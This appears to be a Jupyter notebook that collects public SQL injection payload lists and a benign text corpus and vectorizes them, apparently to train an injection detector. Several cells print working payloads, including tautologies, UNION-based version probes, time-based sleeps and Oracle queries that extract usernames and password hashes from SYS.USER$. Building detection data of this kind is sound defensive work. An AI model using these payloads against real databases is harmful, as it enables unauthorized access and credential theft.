In [1]:
import keras

Using TensorFlow backend.

In [2]:
import nltk

### File_name: git_foospidy_payloads_fuzzing_code_db_sqli.txt
##### Comments :  OK

In [104]:
path='./data/collection/git_foospidy_payloads_fuzzing_code_db_sqli.txt'

In [105]:
sql_lines_fuzzing=[]
f = open(path, "r")
for x in f:
    sql_lines_fuzzing.append(x)

In [106]:
sql_lines_fuzzing[:5]

["'sqlvuln\n", "'+sqlvuln\n", 'sqlvuln;\n', '(sqlvuln)\n', "a' or 1=1--\n"]

### File_Name: git_foospidy_payloads_other_sqli_camoufl4g3.txt
##### Comments : ok

In [108]:
path='./data/collection/git_foospidy_payloads_other_sqli_camoufl4g3.txt'

In [109]:
sql_lines_camoufl4g3=[]
f = open(path, "r")
for x in f:
    sql_lines_camoufl4g3.append(x)

In [110]:
sql_lines_camoufl4g3[:5]

["'-'\n", "' '\n", "'&'\n", "'^'\n", "'*'\n"]

### File_Name: git_foospidy_payloads_other_sqli_libinjection-bypasses.txt
##### Comments: Should Remove &()o1: from start of each sentence

In [111]:
path='./data/collection/git_foospidy_payloads_other_sqli_libinjection-bypasses.txt'

In [112]:
sql_lines_bypasses=[]
f = open(path, "r")
for x in f:
    sql_lines_bypasses.append(x)

In [113]:
sql_lines_bypasses[:5]

['&()o1: select * from users where id=1 or (\\)=1 union select 1,@@VERSION -- 1\n',
 '&(.)o: select * from users where id=1 or (\\.)=1 union select 1,@@VERSION -- 1\n',
 '&(1&1: select * from users where id=1 or (\\+)=1 or 1=1 -- 1\n',
 '&(1)o: select * from users where id=1 or (1)=1 union select 1,banner from v$version where rownum=1 -- 1\n',
 '&(1UE: select * from users where id=1 or (\\+)=1 union select 1,@@VERSION -- 1\n']

In [114]:
# if don't want &(*)* sign in beginning of each sentence then run next code else don't
sql_lines_parsed=[]
for i in range(len(sql_lines_bypasses)):
    sentence=sql_lines_bypasses[i]
    sentence=sentence.split(':')[1]
    sql_lines_parsed.append(sentence)

In [115]:
sql_lines_parsed[:5]

[' select * from users where id=1 or (\\)=1 union select 1,@@VERSION -- 1\n',
 ' select * from users where id=1 or (\\.)=1 union select 1,@@VERSION -- 1\n',
 ' select * from users where id=1 or (\\+)=1 or 1=1 -- 1\n',
 ' select * from users where id=1 or (1)=1 union select 1,banner from v$version where rownum=1 -- 1\n',
 ' select * from users where id=1 or (\\+)=1 union select 1,@@VERSION -- 1\n']

### File_Name: git_foospidy_payloads_owasp_sqli.txt
##### Comments: ok

In [116]:
path='./data/collection/git_foospidy_payloads_owasp_sqli.txt'

In [117]:
sql_lines_owasp=[]
f = open(path, "r")
for x in f:
    sql_lines_owasp.append(x)

In [118]:
sql_lines_owasp[40:55]

["' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i\n"]

### File_Name: git_seclist_fuzzing_sqli_Generic-SQLi.txt
##### comments: should we remove %20 by spaces because %20 equals to space

In [119]:
path='./data/collection/git_seclist_fuzzing_sqli_Generic-SQLi.txt'

In [120]:
sql_lines_Generic=[]
f = open(path, "r")
for x in f:
    sql_lines_Generic.append(x)

In [121]:
sql_lines_Generic[:15]

[")%20or%20('x'='x\n",
 '%20or%201=1\n',
 "; execute immediate 'sel' || 'ect us' || 'er'\n",
 'benchmark(10000000,MD5(1))#\n',
 'update\n',
 '";waitfor delay \'0:0:__TIME__\'--\n',
 '1) or pg_sleep(__TIME__)--\n',
 '||(elt(-3+5,bin(15),ord(10),hex(char(45))))\n',
 '"hi"") or (""a""=""a"\n',
 'delete\n',
 'like\n',
 '" or sleep(__TIME__)#\n',
 'pg_sleep(__TIME__)--\n',
 '*(|(objectclass=*))\n',
 'declare @q nvarchar (200) 0x730065006c00650063 ...\n']

### File_name: scottparker_ml_sqli_src__trainingdata_plain.txt
##### Comments: Should I remove data containing urls

In [94]:
path='./data/collection/'
file="scottparker_ml_sqli_src__trainingdata_plain.txt"

In [99]:
    df = pd.read_csv(os.path.join(path,file), sep='Aw3s0meSc0t7', names=['benign'], header=None, engine='python')

In [131]:
df.head()

                                         benign
0                           Add plain text here
1                      Ne te quaesiveris extra.
2    Man is his own star; and the soul that can
3           Render an honest and a perfect man,
4  Commands all light, all influence, all fate;

In [130]:
df['benign'][3693]

'comment6, http://www.thejustincredible.com/queer/pdf-14218-236-the_walker_bedtime_book.html The Walker Bedtime Book,  gryvhg, http://www.millymillz.com/fat-acceptance/pdf-14077-374-look_back_in_anger.html Look Back in Anger,  05830, http://www.nicholasfrance.com/humanities/pdf-14281-148-mirror_image.html Mirror Image,  >:-OO, http://www.thejustincredible.com/historical-fiction/pdf-14312-117-seeing_the_invisible_pb_champions_of_the_faith_.html SEEING THE INVISIBLE PB (Champions of the faith),  >:-D, http://www.warintheheavens.com/italian-literature/pdf-14354-67-praying_to_get_results.html Praying to Get Results,  obtlvd, http://www.michelleandnaf.com/feminist-studies/pdf-13931-334-the_divine_pity.html The Divine Pity'

Statistics

In [103]:
print("Benign records: %2i" %len(df))

Benign records: 3694

In [127]:
print(f"SQL fuzzing : {len(sql_lines_fuzzing)}  camoufl4gs : {len(sql_lines_camoufl4g3)} parsed : {len(sql_lines_parsed)} owasp : {len(sql_lines_owasp)} generic : {len(sql_lines_Generic)} \n total sql injection data : {len(sql_lines_Generic)+len(sql_lines_owasp)+len(sql_lines_parsed)+len(sql_lines_camoufl4g3)+len(sql_lines_fuzzing)} ")

SQL fuzzing : 142  camoufl4gs : 77 parsed : 474 owasp : 167 generic : 268
 total sql injection data : 1128

#### combination

In [132]:
all_sqli_sentence=sql_lines_owasp+sql_lines_parsed+sql_lines_camoufl4g3+sql_lines_fuzzing+sql_lines_Generic

In [133]:
len(all_sqli_sentence)

1128

In [134]:
from sklearn.feature_extraction.text import TfidfVectorizer

In [135]:
vectorizer = TfidfVectorizer()
X = vectorizer.fit_transform(all_sqli_sentence)

In [136]:
X

<1128x271 sparse matrix of type '<class 'numpy.float64'>'
	with 5113 stored elements in Compressed Sparse Row format>

In [138]:
X=df['benign'].values

In [140]:
vectorizer = TfidfVectorizer()
X = vectorizer.fit_transform(X)

In [141]:
X

<3694x10402 sparse matrix of type '<class 'numpy.float64'>'
	with 56418 stored elements in Compressed Sparse Row format>